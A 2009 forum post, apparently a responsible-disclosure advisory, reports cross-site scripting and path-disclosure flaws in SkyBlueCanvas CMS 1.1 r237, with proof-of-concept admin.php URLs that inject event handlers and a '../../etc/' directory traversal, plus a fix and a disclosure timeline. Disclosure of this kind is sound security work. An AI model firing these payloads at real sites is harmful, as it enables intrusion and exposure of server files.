InterN0T - Advisories Advisories that are found by members of InterN0T.

InterN0T Affiliates:
EvilZonepy1337

SirCapsAlot.NET

Reply
 
LinkBack (3) Thread Tools Display Modes
  3 links from elsewhere to this Post. Click to view. #1  
Old 12th June 2009, 21:51
MaXe's Avatar
The Founder
  
Join Date: Jun 2008
Location: Sweden - Ljusdal
Posts: 2,714
Blog Entries: 31
Rep Power: 10
Reputation: 146
MaXe will become a Token soonMaXe will become a Token soon
[InterN0T] SkyBlueCanvas 1.1 r237 - Multiple Vulnerabilities
SkyBlueCanvas - XSS and Path Content Disclosure Vulnerabilities

Version Affected: 1.1 r237 (newest version: 1.1 r246)

Info: SkyBlueCanvas Lightweight CMS is an open source, free
content management system written in php and built specifically
for small web sites. The entire site you are viewing is a
demonstration of the SkyBlueCanvas lightweight CMS.
SkyBlueCanvas is custom-built for those instances when more
robust systems like Joomla, WordPress and Drupal are too much
horsepower.

Credits: InterN0T

External Links:
http://www.skybluecanvas.com


-:: The Advisory ::-
Quote:
Vulnerable Function / ID Calls:
mgroup, mgr, objtype, id & dir.

Cross Site Scripting: (requires administrator access - will not survive a login screen)
http://[HOST]/skybluecanvas/admin.php?mgroup=" onmouseover=alert(0) > &mgr=email&objtype=email&sub=viewemail&id=2
http://[HOST]/skybluecanvas/admin.php?mgroup=collections&mgr=" onmouseover=alert(0) > &com=manager

Impossible XSS: (XML errors or hidden tags preventing use of event handlers.)
http://[HOST]/skybluecanvas/admin.php?mgroup=pages&mgr=page&objtype=XSS
http://[HOST]skybluecanvas/admin.php?mgroup=settings&mgr=configuration&objtyp e=">XSS
http://[HOST]/skybluecanvas/admin.php?mgroup=pages&mgr=page&objtype=page&sub=e ditpage&id=" onfocus=alert(0) >
http://[HOST]/skybluecanvas/admin.php?mgrou=pictures&mgr=media&dir='XSS

Path Content Disclosure: (requires admin privileges)
http://[HOST]/skybluecanvas/admin.php?mgrou=pictures&mgr=media&dir=../../../../../../../etc/
-- This was done in a folder where /skybluecanvas was located in: /var/www/somesite.tld/awebdir/skybluecanvas/
--=-- In the above, if One goes to a folder with many subdirectories the above will fail due to a memory allocation flaw.

Path Disclosure: (requires admin privileges)
http://[HOST]/skybluecanvas/admin.php?mgroup=pictures&mgr=media&objtype=media& dir=all&sub=move&id='
http://[HOST]/skybluecanvas/admin.php?mgroup=pictures&mgr=media&objtype=media& dir=all&sub=rename&id='
-:: Solution ::-
Filter event handlers out from function calls.

Conclusion:
Pretty secure system overall but if One is a little inventive, then the above issues might be exploitable.

Disclosure Information:
- Vulnerabilities found, researched and confirmed between 5th to 10th June.
- Advisory finished and published on InterN0T the 12th June.
- Vendor and Buqtraq (SecurityFocus) contacted the 12th June.


All of the best,
MaXe
__________________
Code:
                                ____/____\_________________
                      \|/      | OMG IT'S TEH LEET STORY!! |
    /*\         /\    -*-      |______  ________/\_________|
   // \\       /  \   /|\        /    \/    \  /  \
  /// \\\     /    \            /            \/    \
   // \\     /      \          /      \o/     \     \
    | |     /        \        /        |       \     \
 ___| |____/          \______/________/ \_______\_____\_________
          /     o      \
               #"=-
               /\
 __________________________________________________________
    On a mission, to find the lost member of Teh Unkwon..
Reply With Quote
Reply

Bookmarks

« [InterN0T] Pivot 1.40.4-7 - Multiple Vulnerabilities | [InterN0T] TBDev 01-01-2008 - Multiple Vulnerabilities »
Thread Tools
Display Modes
Linear Mode Linear Mode

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are On

LinkBacks (?)
LinkBack to this Thread: http://forum.intern0t.net/intern0t-advisories/1120-intern0t-skybluecanvas-1-1-r237-multiple-vulnerabilities.html
Posted By For Type Date
CVE - CVE-2009-2116 (under review) This thread Refback 28th January 2010 08:45
ISS X-Force Database: skybluecanvas-admin-path-disclosure(51164): SkyBlueCanvas admin.php path disclosure This thread Refback 22nd June 2009 17:21
SkyBlueCanvas Cross-Site Scripting Vulnerabilities - Secunia Advisories - Vulnerability Information - Secunia.com This thread Refback 16th June 2009 16:56

Similar Threads
Thread Thread Starter Forum Replies Last Post
[InterN0T] AMember 3.1.7 - Multiple Vulnerabilities MaXe InterN0T - Advisories 11 27th September 2009 19:09
[InterN0T] transLucid 1.75 - Multiple Vulnerabilities MaXe InterN0T - Advisories 0 12th June 2009 22:02
[InterN0T] TBDev 01-01-2008 - Multiple Vulnerabilities MaXe InterN0T - Advisories 0 12th June 2009 21:58
[InterN0T] Pivot 1.40.4-7 - Multiple Vulnerabilities MaXe InterN0T - Advisories 0 12th June 2009 21:47


All times are GMT +2. The time now is 09:56.
Copyright ©2007 - Forever, InterN0T & Teh Unkwon

Hosted by 1and1


Contact Us - InterN0T - Archive - Top
Powered by vBulletin® Version 1.3.37
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.